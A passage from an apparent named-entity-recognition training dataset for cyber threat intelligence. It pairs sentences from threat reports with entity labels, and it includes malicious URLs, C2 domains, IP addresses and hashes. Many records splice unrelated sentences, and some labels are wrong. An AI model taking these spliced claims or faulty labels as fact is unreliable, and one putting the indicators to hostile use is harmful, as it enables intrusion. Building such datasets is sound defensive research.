How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown . Carbanak is a threat group that mainly targets banks .", "spans": {"THREAT_ACTOR: Buckeye": [[93, 100]], "TOOL: Equation Group tools": [[110, 130]], "THREAT_ACTOR: Carbanak": [[198, 206]]}, "info": {"id": "cyberner_stix_train_007052", "source": "cyberner_stix_train"}} {"text": "They should also take the following steps to harden both web applications and the servers hosting them to reduce the risk of network intrusion via this vector .", "spans": {}, "info": {"id": "cyberner_stix_train_007053", "source": "cyberner_stix_train"}} {"text": "Distribution via alternative app stores . LuckyMouse has been spotted using a widely used Microsoft Office vulnerability ( CVE-2017-11882 ) . The launcher is a 32-bit DLL named hpqhvsei.dll , which is the name of a legitimate DLL loaded by hpqhvind.exe . In one of our previous blog entries , we covered how the threat actor known as Winnti was using GitHub to spread malware – a development that shows how the group is starting to evolve and use new attack methods beyond their previous tactics involving targeted attacks against gaming , pharmaceutical , and telecommunications companies .", "spans": {"VULNERABILITY: Microsoft Office vulnerability": [[90, 120]], "VULNERABILITY: CVE-2017-11882": [[123, 137]], "TOOL: DLL": [[167, 170], [226, 229]], "FILEPATH: hpqhvsei.dll": [[177, 189]], "FILEPATH: hpqhvind.exe": [[240, 252]], "THREAT_ACTOR: threat actor": [[312, 324]], "THREAT_ACTOR: Winnti": [[334, 340]], "THREAT_ACTOR: the group": [[407, 416]], "ORGANIZATION: gaming , pharmaceutical , and telecommunications companies": [[531, 589]]}, "info": {"id": "cyberner_stix_train_007054", "source": "cyberner_stix_train"}} {"text": "Two of these campaigns were detailed in separate blog posts by the Polish security company Prevenity , who said that both campaigns targeted Polish entities with spear- phishing emails containing malicious 
attachments with relevant Polish language names .", "spans": {"ORGANIZATION: Prevenity": [[91, 100]], "TOOL: emails": [[178, 184]]}, "info": {"id": "cyberner_stix_train_007055", "source": "cyberner_stix_train"}} {"text": "It is however still only an iteration on earlier versions of the MiniDuke loader .", "spans": {"MALWARE: MiniDuke": [[65, 73]]}, "info": {"id": "cyberner_stix_train_007056", "source": "cyberner_stix_train"}} {"text": "The user visits the URL to complete the payment and enters their phone number . The group has also targeted businesses operating in the South China Sea , which is a strategically important region and the focus of disputes between China and other states . Ps Process service Unix command implementation . What ’s more , two other vulnerabilities in MOVEit were found while new victims were still coming forward .", "spans": {"ORGANIZATION: businesses": [[108, 118]], "SYSTEM: Unix": [[274, 278]], "TOOL: MOVEit": [[348, 354]]}, "info": {"id": "cyberner_stix_train_007057", "source": "cyberner_stix_train"}} {"text": "During our investigation into the activity , FireEye identified a direct overlap between BADRABBIT redirect sites and sites hosting a profiler we’ve been tracking as BACKSWING . 
The Magic Hound campaign was also discovered using a custom dropper tool , which we have named MagicHound.DropIt .", "spans": {"ORGANIZATION: FireEye": [[45, 52]], "MALWARE: BADRABBIT": [[89, 98]], "TOOL: BACKSWING": [[166, 175]], "MALWARE: custom dropper": [[231, 245]], "FILEPATH: MagicHound.DropIt": [[273, 290]]}, "info": {"id": "cyberner_stix_train_007058", "source": "cyberner_stix_train"}} {"text": "The one non-random string difference was the path to the “ .txt ” and “ .exe ” files within the command “ certutil -decode ” , as the Sofacy document used “ C:\\Programdata\\ ” for the path whereas the Luckystrike document used the path stored in the Application.UserLibraryPath environment variable .", "spans": {"FILEPATH: .txt": [[59, 63]], "FILEPATH: .exe": [[72, 76]], "THREAT_ACTOR: Sofacy": [[134, 140]], "TOOL: Luckystrike": [[200, 211]], "FILEPATH: Application.UserLibraryPath": [[249, 276]]}, "info": {"id": "cyberner_stix_train_007059", "source": "cyberner_stix_train"}} {"text": "During the May 2014 Ukrainian presidential election , purported pro-Russian hacktivists CyberBerkut conducted a series of malicious activities against the CEC including a system compromise , data destruction , a data leak , a distributed denial-of-service ( DDoS ) attack , and an attempted defacement of the CEC website with fake election results .", "spans": {"THREAT_ACTOR: CyberBerkut": [[88, 99]], "ORGANIZATION: CEC": [[155, 158], [309, 312]]}, "info": {"id": "cyberner_stix_train_007060", "source": "cyberner_stix_train"}} {"text": "The ‘ onload2 ’ function decrypts the response received from the HTTP request issued in ‘ onload1 ’ function .", "spans": {}, "info": {"id": "cyberner_stix_train_007061", "source": "cyberner_stix_train"}} {"text": "The class “ org.starsizew.Tb ” also has a self-monitoring mechanism to restart itself when its own onDestroy API is triggered . 
Artifacts identified within the malware samples related to these attacks also suggest the targeting of the defense industry in Saudi Arabia , which appears to be related to an earlier wave of attacks carried out in the fall of 2015 . Finally , the malware will write the “ IndexOffice.txt ” file in the “ %APPDATA%\\Microsoft\\Office\\ ” path . In early 2020 , new versions of Foudre a malware associated with the APT Advanced Persistent Threat Infy discussed in detail below emerged with new and improved elements from previous versions .", "spans": {"ORGANIZATION: defense industry": [[235, 251]], "FILEPATH: IndexOffice.txt": [[401, 415]], "MALWARE: Foudre": [[499, 505]], "MALWARE: malware": [[508, 515]], "THREAT_ACTOR: APT Advanced Persistent Threat Infy": [[536, 571]]}, "info": {"id": "cyberner_stix_train_007062", "source": "cyberner_stix_train"}} {"text": "The macro ran a PowerShell command that attempted to download additional PowerShell loader scripts for PupyRAT , a research and penetration-testing tool that has been used in attacks . The pie chart in Figure 8 shows that the vast majority ( 73% ) of the hosts are geographically located in Thailand , which matches the known targeting of this threat group .", "spans": {"TOOL: PowerShell command": [[16, 34]], "TOOL: PupyRAT": [[103, 110]], "TOOL: research and penetration-testing tool": [[115, 152]]}, "info": {"id": "cyberner_stix_train_007063", "source": "cyberner_stix_train"}} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "ORGANIZATION: specific individuals": [[83, 103]], "VULNERABILITY: zero-day exploits": [[144, 161]], "ORGANIZATION: Trend Micro": [[246, 257]], "FILEPATH: espionage toolkit": [[307, 324]], "MALWARE: KeyBoy": [[405, 411]]}, "info": {"id": "cyberner_stix_train_007064", "source": "cyberner_stix_train"}} {"text": "The key for the RC4 encryption in this sample is the hardcoded string “ h0le ” .", "spans": {}, "info": {"id": "cyberner_stix_train_007065", "source": "cyberner_stix_train"}} {"text": "Quasar contains the NetSerializer library that handles serialization of high level IPacket objects that the client and server use to communicate .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: NetSerializer library": [[20, 41]], "TOOL: client and server": [[108, 125]]}, "info": {"id": "cyberner_stix_train_007066", "source": "cyberner_stix_train"}} {"text": "Palo Alto Networks Traps Advanced Endpoint Protection recently prevented recent attacks that we believe are part of a campaign linked to DustySky .", "spans": {"ORGANIZATION: Palo Alto Networks Traps Advanced Endpoint Protection": [[0, 53]]}, "info": {"id": "cyberner_stix_train_007067", "source": "cyberner_stix_train"}} {"text": "The malicious executables all called out to the same URLs on windowsnewupdates.com .", "spans": {"DOMAIN: windowsnewupdates.com": [[61, 82]]}, "info": {"id": "cyberner_stix_train_007068", "source": "cyberner_stix_train"}} {"text": "Figure 13 : Popup asking for a credit card number The application also supports stealing credit card verification information ( Figures 14 and 15 ) . By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable . 
The intrusion into healthcare company Anthem has been attributed to Deep Panda .", "spans": {"ORGANIZATION: Apple": [[205, 210]], "ORGANIZATION: Google": [[215, 221]], "THREAT_ACTOR: CIA": [[226, 229]], "ORGANIZATION: Anthem": [[355, 361]], "THREAT_ACTOR: to Deep Panda": [[382, 395]]}, "info": {"id": "cyberner_stix_train_007069", "source": "cyberner_stix_train"}} {"text": "As Riltok shows , cybercriminals can apply the same methods of infection to victims in different countries with more or less the same success . Kaspersky found an active campaign by a Chinese APT group we call SixLittleMonkeys that uses a new version of the Microcin Trojan and a RAT that we call HawkEye as a last stager . Indeed , the malware author moved this part of the code from the core of the malware to a library .", "spans": {"MALWARE: Riltok": [[3, 9]], "ORGANIZATION: Kaspersky": [[144, 153]], "THREAT_ACTOR: SixLittleMonkeys": [[210, 226]], "TOOL: Microcin Trojan": [[258, 273]], "TOOL: RAT": [[280, 283]]}, "info": {"id": "cyberner_stix_train_007070", "source": "cyberner_stix_train"}} {"text": "] top/ Oct 17 , 2017 hxxp : //online.bankaustria.at.id87721 [ . The attackers would then use the certificate on actor-controlled servers to perform additional MitM operations to harvest additional credentials . APT28 is a threat group that has been attributed to Russia's Main Intelligence Directorate of the Russian General Staff by a July 2018 U.S. Department of Justice indictment .", "spans": {"THREAT_ACTOR: attackers": [[68, 77]], "TOOL: MitM": [[159, 163]], "THREAT_ACTOR: APT28": [[211, 216]], "ORGANIZATION: Russia's Main Intelligence Directorate of the Russian General Staff": [[263, 330]], "ORGANIZATION: U.S. 
Department of Justice": [[346, 372]]}, "info": {"id": "cyberner_stix_train_007071", "source": "cyberner_stix_train"}} {"text": "IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia .", "spans": {"ORGANIZATION: IBM": [[0, 3]], "MALWARE: Shamoon2": [[81, 89]]}, "info": {"id": "cyberner_stix_train_007072", "source": "cyberner_stix_train"}} {"text": "Once the user double-clicks on the executable file , the dropper drops a Word document in %AppData% and displays the following decoy document to the victim , while the dropper runs in the background and installs the backdoor . %appdata%\\info.docx :", "spans": {"TOOL: Word": [[73, 77]], "FILEPATH: %appdata%\\info.docx": [[227, 246]]}, "info": {"id": "cyberner_stix_train_007073", "source": "cyberner_stix_train"}} {"text": "Commercial reporting has referred to this activity as Lazarus Group and Guardians of Peace .", "spans": {"THREAT_ACTOR: Lazarus": [[54, 61]], "THREAT_ACTOR: Guardians of Peace": [[72, 90]]}, "info": {"id": "cyberner_stix_train_007074", "source": "cyberner_stix_train"}} {"text": "While unlikely , it is worth considering that the same C&C server might have been the subject of 3rd-party attacks due to this vulnerability .", "spans": {"TOOL: C&C": [[55, 58]]}, "info": {"id": "cyberner_stix_train_007075", "source": "cyberner_stix_train"}} {"text": "Malicious activity is trigged only on user interaction , attackers normally use this technique to bypass sandbox/automated analysis .", "spans": {}, "info": {"id": "cyberner_stix_train_007076", "source": "cyberner_stix_train"}} {"text": "This particular application is signed with a fake certificate : Owner : CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Issuer CN=Unknown , OU=Unknown , O=Unknown , L=Unknown , ST=Unknown , C=Unknown Serial : 1c9157d7 Validity : 11/02/2017 00:16:46 03/20/2045 00:16:46 MD5 Hash : A8:55:46:32:15 If the user enables macro to open the xlsm 
file , it will then drop the legitimate script engine AutoHotkey along with a malicious script file . As of June 2015 , the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong .", "spans": {"TOOL: xlsm file": [[358, 367]], "MALWARE: it": [[370, 372]]}, "info": {"id": "cyberner_stix_train_007077", "source": "cyberner_stix_train"}} {"text": "In the beginning of July 2015 , the Dukes embarked on yet another large-scale phishing campaign .", "spans": {"THREAT_ACTOR: Dukes": [[36, 41]]}, "info": {"id": "cyberner_stix_train_007078", "source": "cyberner_stix_train"}} {"text": "On many occasions , both the dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual machine , using a debugger , or located within a sandbox .", "spans": {}, "info": {"id": "cyberner_stix_train_007079", "source": "cyberner_stix_train"}} {"text": "There are the following relevant detection paths ( the last one is an alternative Telegram client – “ Telegram X “ ) : Name Detection path Sex Game For Adults 18.apk /storage/emulated/0/WhatsApp/Media/WhatsApp Documents/ 4_6032967490689041387.apk /storage/emulated/0/Telegram/Telegram Documents/ Psiphon-v91.apk /storage/emulated/0/Android/data/org.thunderdog.challegram/files/documents/ Backdoored Open Source During the course For simplicity , Kaspersky is calling them the BlackEnergy APT group . 
We believe they may have some links to North Korea , which may explain why ScarCruft decided to closely monitor them .", "spans": {"ORGANIZATION: Kaspersky": [[446, 455]], "THREAT_ACTOR: ScarCruft": [[575, 584]]}, "info": {"id": "cyberner_stix_train_007080", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT uses custom batch scripts to collect either specific file types ( including files with .pptx , .xlsx , .pdf extensions ) or all files within a specific location .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "FILEPATH: .pptx": [[104, 109]], "FILEPATH: .xlsx": [[112, 117]], "FILEPATH: .pdf": [[120, 124]]}, "info": {"id": "cyberner_stix_train_007081", "source": "cyberner_stix_train"}} {"text": "Analysis of those files uncovered two more imphashes , 0B4E44256788783634A2B1DADF4F9784 and E44F0BD2ADFB9CBCABCAD314D27ACCFC , for a total of 20 malicious files .", "spans": {"FILEPATH: 0B4E44256788783634A2B1DADF4F9784": [[55, 87]], "FILEPATH: E44F0BD2ADFB9CBCABCAD314D27ACCFC": [[92, 124]]}, "info": {"id": "cyberner_stix_train_007082", "source": "cyberner_stix_train"}} {"text": "CTU researchers discovered the threat actors searching for \" [company] login , \" which directed them to the landing page for remote access .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_007083", "source": "cyberner_stix_train"}} {"text": "What this means for you All Lookout customers are protected from this threat . The Axiom group has been presented as an advanced Chinese threat actor carrying out cyber-espionage attacks against a whole range of different industries . The ZxShell mutex is created named @_ZXSHELL_@ . 
The file c018c54eff8fd0b9be50b5d419d80f21 ( r3_iec104_control.py ) imports the \" iec104_mssql_lib \" module , which is contained within the extracted contents as adfa40d44a58e1bc909abca444f7f616 ( iec104_mssql_lib.pyc ): 2b86adb6afdfa9216ef8ec2ff4fd2558 ( iec104_mssql_lib.py ) implements PIEHOP ’s primary capabilities and contains many developer - supplied comments for the included code .", "spans": {"ORGANIZATION: Lookout": [[28, 35]], "THREAT_ACTOR: Axiom": [[83, 88]], "TOOL: ZxShell": [[239, 246]], "MALWARE: PIEHOP ’s": [[572, 581]]}, "info": {"id": "cyberner_stix_train_007084", "source": "cyberner_stix_train"}} {"text": "Dropping Elephant ( also known as \" Chinastrats \" and \" Patchwork \" ) is a relatively new threat actor that is targeting a variety of high profile diplomatic and economic targets using a custom set of attack tools . It is therefore possible that the large percentage of high value targets identified in our analysis of the GhostNet are coincidental , spread by contact between individuals who previously communicated through e-mail .", "spans": {"THREAT_ACTOR: Dropping Elephant": [[0, 17]], "THREAT_ACTOR: Chinastrats": [[36, 47]], "THREAT_ACTOR: Patchwork": [[56, 65]], "THREAT_ACTOR: threat actor": [[90, 102]], "ORGANIZATION: diplomatic": [[147, 157]], "ORGANIZATION: economic": [[162, 170]], "TOOL: e-mail": [[425, 431]]}, "info": {"id": "cyberner_stix_train_007085", "source": "cyberner_stix_train"}} {"text": "DROPSHOT is a notable piece of malware used to deliver variants of the TURNEDUP backdoor . 
The campaign code \" 20150920 \" is associated with this decoy , which is a week prior to media articles announcing that the Crown Price of Thailand Maha Vajiralongkorn will lead the Bike for Dad 2015 event .", "spans": {"TOOL: DROPSHOT": [[0, 8]], "TOOL: malware": [[31, 38]], "ORGANIZATION: media": [[179, 184]]}, "info": {"id": "cyberner_stix_train_007086", "source": "cyberner_stix_train"}} {"text": "Each organization typically only saw a handful of employees at the receiving end of these emails .", "spans": {"TOOL: emails": [[90, 96]]}, "info": {"id": "cyberner_stix_train_007087", "source": "cyberner_stix_train"}} {"text": "Interestingly , there appear to be two parallel efforts within the campaign , with each effort using a completely different toolset for the attacks .", "spans": {}, "info": {"id": "cyberner_stix_train_007088", "source": "cyberner_stix_train"}} {"text": "This mimics the wallet updater connected to the C2 addresses : wfcwallet.com ( resolved ip : 108.174.195.134 ) , www.chainfun365.com ( resolved ip : 23.254.217.53 ) .", "spans": {"TOOL: C2": [[48, 50]], "DOMAIN: wfcwallet.com": [[63, 76]], "IP_ADDRESS: 108.174.195.134": [[93, 108]], "DOMAIN: www.chainfun365.com": [[113, 132]], "IP_ADDRESS: 23.254.217.53": [[149, 162]]}, "info": {"id": "cyberner_stix_train_007089", "source": "cyberner_stix_train"}} {"text": "After analyzing the traffic associated with these short links , we determined that each one was associated with a referral path from mail.mosa.pna.ps . With Javafog , we are turning yet another page in the Icefog story by discovering another generation of backdoors used by the attackers . When APT1 attackers are not using WEBC2 , they require a “ command and control ” ( C2 ) user interface so they can issue commands to the backdoor . 
Cisco Talos researchers recently discovered Greatness , one of the most advanced phishing - as - a - service tools ever seen in the wild .", "spans": {"TOOL: Icefog": [[206, 212]], "THREAT_ACTOR: APT1": [[295, 299]], "MALWARE: WEBC2": [[324, 329]], "TOOL: command and control": [[349, 368]], "TOOL: C2": [[373, 375]], "ORGANIZATION: Cisco Talos researchers": [[438, 461]], "TOOL: Greatness": [[482, 491]], "THREAT_ACTOR: phishing - as - a - service tools": [[519, 552]]}, "info": {"id": "cyberner_stix_train_007090", "source": "cyberner_stix_train"}} {"text": "] info OpSec fails and use of cryptography While looking at this infrastructure , we identified that one of these domains has directory indexing enabled . On May 2 , 2016 , Palo Alto published the report \" Prince of Persia \" , which provided the first public and widely-reported indication of Infy 's activities in Iran , while other publications either refrained from making the association or were not openly available . However , they also include names referencing English-speaking countries , such as “ aunewsonline.com ” ( Australia ) , “ canadatvsite.com ” ( Canada ) , and “ todayusa.org ” ( U.S . ) . Our demonstration shows how using the Google Analytics API , a web skimmer can send data to be collected in his own account instance .", "spans": {"ORGANIZATION: Palo Alto": [[173, 182]], "DOMAIN: aunewsonline.com": [[508, 524]], "DOMAIN: canadatvsite.com": [[545, 561]], "DOMAIN: todayusa.org": [[583, 595]], "SYSTEM: Google Analytics API": [[648, 668]], "THREAT_ACTOR: a web skimmer": [[671, 684]]}, "info": {"id": "cyberner_stix_train_007091", "source": "cyberner_stix_train"}} {"text": "] net , negg2.ddns [ . We found two malicious iOS applications in Operation Pawn Storm . 
The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": {"ORGANIZATION: We": [[23, 25]], "THREAT_ACTOR: admin@338": [[93, 102]], "ORGANIZATION: financial": [[131, 140]], "ORGANIZATION: policy organizations": [[145, 165]], "TOOL: emails": [[205, 211]], "ORGANIZATION: audiences": [[254, 263]]}, "info": {"id": "cyberner_stix_train_007092", "source": "cyberner_stix_train"}} {"text": "To protect against code injections and other attacks , system operators should routinely evaluate known and published vulnerabilities , periodically perform software updates and technology refreshes , and audit external-facing systems for known web application vulnerabilities .", "spans": {"TOOL: external-facing systems": [[211, 234]]}, "info": {"id": "cyberner_stix_train_007093", "source": "cyberner_stix_train"}} {"text": "While FireEye has not directly observed BACKSWING delivering BADRABBIT , BACKSWING was observed on multiple websites that were seen referring FireEye customers to 1dnscontrol.com , which hosted the BADRABBIT dropper . Less than a week after Microsoft issued a patch for CVE-2017-11882 on Nov. 
14 , 2017 , FireEye observed an attacker using an exploit for the Microsoft Office vulnerability to target a government organization in the Middle East .", "spans": {"ORGANIZATION: FireEye": [[6, 13], [142, 149], [305, 312]], "ORGANIZATION: BACKSWING": [[40, 49], [73, 82]], "MALWARE: BADRABBIT": [[61, 70]], "MALWARE: BADRABBIT dropper": [[198, 215]], "ORGANIZATION: Microsoft": [[241, 250]], "VULNERABILITY: CVE-2017-11882": [[270, 284]], "THREAT_ACTOR: attacker": [[325, 333]], "VULNERABILITY: exploit": [[343, 350]], "TOOL: Microsoft Office": [[359, 375]], "ORGANIZATION: government organization": [[402, 425]]}, "info": {"id": "cyberner_stix_train_007094", "source": "cyberner_stix_train"}} {"text": "The beginning of 2011 however saw a significant break from that routine , when a large grouping of domain names was registered by the Dukes in two batches ; the first batch was registered on the 29th of January and the second on the 13th of February .", "spans": {"THREAT_ACTOR: Dukes": [[134, 139]]}, "info": {"id": "cyberner_stix_train_007095", "source": "cyberner_stix_train"}} {"text": "It then resets cron and removes possible cache files from other programs , starts scripts and binaries a , init0 , and start , and sets the persistence by modifying the crontab .", "spans": {}, "info": {"id": "cyberner_stix_train_007096", "source": "cyberner_stix_train"}} {"text": "Some emulators build their phone number out of the default number created in the emulator software and the port number : 5554. getMachine function using anti-emulator technique . AveMaria is a new botnet , whose first version we found in September 2018 , right after the arrests of the FIN7 members . 
ministries of foreign affairs in Europe have been targeted and compromised by a threat actor we call Ke3chang .", "spans": {"THREAT_ACTOR: AveMaria": [[179, 187]], "THREAT_ACTOR: FIN7": [[286, 290]], "ORGANIZATION: ministries of foreign affairs": [[301, 330]], "THREAT_ACTOR: Ke3chang": [[402, 410]]}, "info": {"id": "cyberner_stix_train_007097", "source": "cyberner_stix_train"}} {"text": "As rooting exploits on Android become less prevalent and lucrative , PHA authors adapt their abuse or monetization strategy to focus on tactics like click fraud . In their Operation Tropic Trooper report , Trend Micro documented the behaviour and functionality of an espionage toolkit with several design similarities to those observed in the various components of KeyBoy . Unlike the Nov. 26 campaign , these attacks targeted Taiwanese governmental and media and entertainment organizations . The contents of the Exchange Web Server ( also found within the folder ) • At least 14 days of Exchange Control Panel ( ECP ) logs , located in We have found significant hunting and analysis value in these log folders , especially for suspicious CMD parameters in the ECP Server logs .", "spans": {"SYSTEM: Android": [[23, 30]], "ORGANIZATION: Trend Micro": [[206, 217]], "MALWARE: espionage toolkit": [[267, 284]], "TOOL: KeyBoy": [[365, 371]], "SYSTEM: Exchange Web Server": [[514, 533]], "SYSTEM: Exchange Control Panel ( ECP ) logs": [[589, 624]], "SYSTEM: ECP Server logs": [[762, 777]]}, "info": {"id": "cyberner_stix_train_007098", "source": "cyberner_stix_train"}} {"text": "Originally intended to target the Russian audience , the banker was later adapted , with minimal modifications , for the European “ market. ” The bulk of its victims ( more than 90 % ) reside in Russia , with France in second place ( 4 % ) . It also reconfigures the Microsoft Sysinternals registry to prevent pop-ups when running the PsExec tool . 
Talos has named this malware KONNI .", "spans": {"TOOL: PsExec tool": [[335, 346]], "ORGANIZATION: Talos": [[349, 354]], "MALWARE: KONNI": [[378, 383]]}, "info": {"id": "cyberner_stix_train_007099", "source": "cyberner_stix_train"}} {"text": "At the time of writing this article , no other significant changes in Asacub ’ s network behavior had been observed : The origin of Asacub It is fairly safe to say that the Asacub family evolved from Trojan-SMS.AndroidOS.Smaps . The threat actors have used the Baidu search engine , which is only available in Chinese , to conduct reconnaissance activities . From the sample we analyzed , attacks started from one virtual private server ( VPS ) that searches for a vulnerable machine to compromise ( previous techniques used malicious URLs or infecting legitimate websites for bot propagation ) . We also want to specifically thank Google ’s Threat Analysis Group ( TAG ) , Mandiant ’s DPRK Fusion Cell , and our government partners for their continued collaboration and support .", "spans": {"MALWARE: Asacub": [[70, 76], [132, 138], [173, 179]], "TOOL: Baidu search engine": [[261, 280]], "TOOL: virtual private server": [[414, 436]], "TOOL: VPS": [[439, 442]], "ORGANIZATION: Google ’s Threat Analysis Group ( TAG )": [[632, 671]], "ORGANIZATION: Mandiant ’s DPRK Fusion Cell": [[674, 702]]}, "info": {"id": "cyberner_stix_train_007100", "source": "cyberner_stix_train"}} {"text": "Malware code showing definition of populateConfigMap Figure 14 . ther names for the group are Vixen Panda , Ke3chang , Royal APT , and Playful Dragon . The other archiving tools were able to extract one file from the ZIP attachment – either order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe . 
CADDYWIPER was then executed as a scheduled task at a predetermined time .", "spans": {"THREAT_ACTOR: group": [[84, 89]], "THREAT_ACTOR: Vixen Panda": [[94, 105]], "THREAT_ACTOR: Ke3chang": [[108, 116]], "THREAT_ACTOR: Royal APT": [[119, 128]], "THREAT_ACTOR: Playful Dragon": [[135, 149]], "FILEPATH: order.jpg or SHIPPING_MX00034900_PL_INV_pdf.exe": [[241, 288]], "MALWARE: CADDYWIPER": [[291, 301]]}, "info": {"id": "cyberner_stix_train_007101", "source": "cyberner_stix_train"}} {"text": "The document loads malicious content from http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm via the settings.xml.rels component that is embedded within the DOCX document .", "spans": {"URL: http://109.248.148.42/office/thememl/2012/main/attachedTemplate.dotm": [[42, 110]], "FILEPATH: settings.xml.rels": [[119, 136]], "TOOL: DOCX": [[175, 179]]}, "info": {"id": "cyberner_stix_train_007102", "source": "cyberner_stix_train"}} {"text": "If brother.apk application is removed , mcpef.apk reinstalls brother.apk from assets . It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . Attachments are typically sent as an executable file embedded in a ZIP archive or a password-protected Microsoft Office document .", "spans": {"SYSTEM: brother.apk": [[3, 14], [61, 72]], "SYSTEM: mcpef.apk": [[40, 49]], "TOOL: technical exploitation capabilities": [[116, 151]], "VULNERABILITY: zero-day exploits": [[218, 235]], "FILEPATH: Attachments": [[412, 423]]}, "info": {"id": "cyberner_stix_train_007103", "source": "cyberner_stix_train"}} {"text": "The ability to carry out these types of intelligence-gathering activities on phones represents a huge score for the operator . 
Based on the patterns of subdomain registration over time in DNS , TRAC believes this is an example where the attackers registered their own second-level domain . The pause and retooling by APT12 was covered in the Mandiant 2014 M-Trends report . As a result , we decided to call this variant FakeSG .", "spans": {"ORGANIZATION: TRAC": [[194, 198]], "THREAT_ACTOR: APT12": [[317, 322]], "ORGANIZATION: Mandiant": [[342, 350]], "ORGANIZATION: M-Trends": [[356, 364]]}, "info": {"id": "cyberner_stix_train_007104", "source": "cyberner_stix_train"}} {"text": "Figure 7 – C2 As seen in Figure 8 , this version of Anubis is built to run on several iterations of the Android operating system , dating back to version 4.0.3 , which was released in 2012 . Wild Neutron 's attack took advantage of a Java zero-day exploit and used hacked forums as watering holes . We recently discovered some interesting telemetry on this actor , and decided to dig deeper into ScarCruft ’s recent activity . The themed \" updates \" look very professional and are more up to date than its SocGholish counterpart .", "spans": {"MALWARE: Anubis": [[52, 58]], "SYSTEM: Android": [[104, 111]], "THREAT_ACTOR: Wild Neutron": [[191, 203]], "VULNERABILITY: Java zero-day exploit": [[234, 255]], "THREAT_ACTOR: ScarCruft": [[396, 405]], "MALWARE: SocGholish": [[506, 516]]}, "info": {"id": "cyberner_stix_train_007105", "source": "cyberner_stix_train"}} {"text": "1849a50a6ac9b3eec51492745eeb14765fe2e78488d476b0336d8e41c2c581d4 d328fca14c4340fcd4a15e47562a436085e6b1bb5376b5ebd83d3e7218db64e7 59b9809dba857c5969f23f460a2bf0a337a71622a79671066675ec0acf89c810 120474682ea439eb0b28274c495d9610a73d892a4b8feeff268c670570db97e2 For the sake of this analysis we'll take the Vietnamese backdoor as an example ; the one found in the Indian attack operates in the exact same way . 
The attackers behind the breach of the New York Times ’ computer network late last year appear to be mounting fresh assaults that leverage new and improved versions of malware . RussianPanda ( @AnFam17 ) named the URL shortcut campaign RogueRaticate .", "spans": {"TOOL: Vietnamese backdoor": [[305, 324]], "ORGANIZATION: New York Times": [[448, 462]], "ORGANIZATION: RussianPanda": [[587, 599]]}, "info": {"id": "cyberner_stix_train_007106", "source": "cyberner_stix_train"}} {"text": "Additionally , one of the two government organizations had the highest infection rate of the Indian targets .", "spans": {}, "info": {"id": "cyberner_stix_train_007107", "source": "cyberner_stix_train"}} {"text": "In our February report , we discovered the Sofacy group using Microsoft Office documents with malicious macros to deliver the SofacyCarberp payload to multiple government entities .", "spans": {"THREAT_ACTOR: Sofacy": [[43, 49]], "ORGANIZATION: Microsoft": [[62, 71]], "ORGANIZATION: Office": [[72, 78]], "MALWARE: SofacyCarberp": [[126, 139]]}, "info": {"id": "cyberner_stix_train_007108", "source": "cyberner_stix_train"}} {"text": "For threat hunting , iDefense recommends searching for the following :", "spans": {}, "info": {"id": "cyberner_stix_train_007109", "source": "cyberner_stix_train"}} {"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 . 
Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": {"ORGANIZATION: Antiy Lab": [[14, 23]], "THREAT_ACTOR: Green Spot": [[54, 64]], "VULNERABILITY: CVE-2017-1099": [[161, 174]], "TOOL: RTF": [[190, 193]]}, "info": {"id": "cyberner_stix_train_007110", "source": "cyberner_stix_train"}} {"text": "In addition to the traffic originating from Chengdu , we identified a selection of hacktools and malware signed using nine stolen certificates .", "spans": {}, "info": {"id": "cyberner_stix_train_007111", "source": "cyberner_stix_train"}} {"text": "It abuses accessibility services . In this blog we provide insight into the tactics , techniques and procedures (TTPs) of a Brazilian cyber crime group that specializes in payment card fraud operations . In August 2017 , we found this threat group has developed yet another Trojan that they call ' Agent Injector ' with the specific purpose of installing the ISMAgent backdoor .", "spans": {"THREAT_ACTOR: crime group": [[140, 151]], "MALWARE: Trojan": [[274, 280]], "MALWARE: ISMAgent backdoor": [[359, 376]]}, "info": {"id": "cyberner_stix_train_007112", "source": "cyberner_stix_train"}} {"text": "Execute a command through exploits for CVE-2018-0802 . 
Their operations against gaming and technology organizations are believed to be economically motivated in nature .", "spans": {"VULNERABILITY: CVE-2018-0802": [[39, 52]], "ORGANIZATION: gaming": [[80, 86]], "ORGANIZATION: technology organizations": [[91, 115]]}, "info": {"id": "cyberner_stix_train_007113", "source": "cyberner_stix_train"}} {"text": "In this scenario , the domain cdnverify.net was registered on January 30 , 2018 and just two days later , an attack was launched using this domain as a C2 .", "spans": {"TOOL: C2": [[152, 154]]}, "info": {"id": "cyberner_stix_train_007114", "source": "cyberner_stix_train"}} {"text": "As mentioned by Kaspersky , even though the exploits used for these MiniDuke campaigns were near-identical to those described by FireEye , there were nevertheless small differences .", "spans": {"ORGANIZATION: Kaspersky": [[16, 25]], "MALWARE: MiniDuke": [[68, 76]], "ORGANIZATION: FireEye": [[129, 136]]}, "info": {"id": "cyberner_stix_train_007115", "source": "cyberner_stix_train"}} {"text": "This threat group attacked defense contractors and aerospace companies . China Chopper contains a remote shell ( Virtual Terminal ) function that has a first suggested command of netstat an|find ESTABLISHED .", "spans": 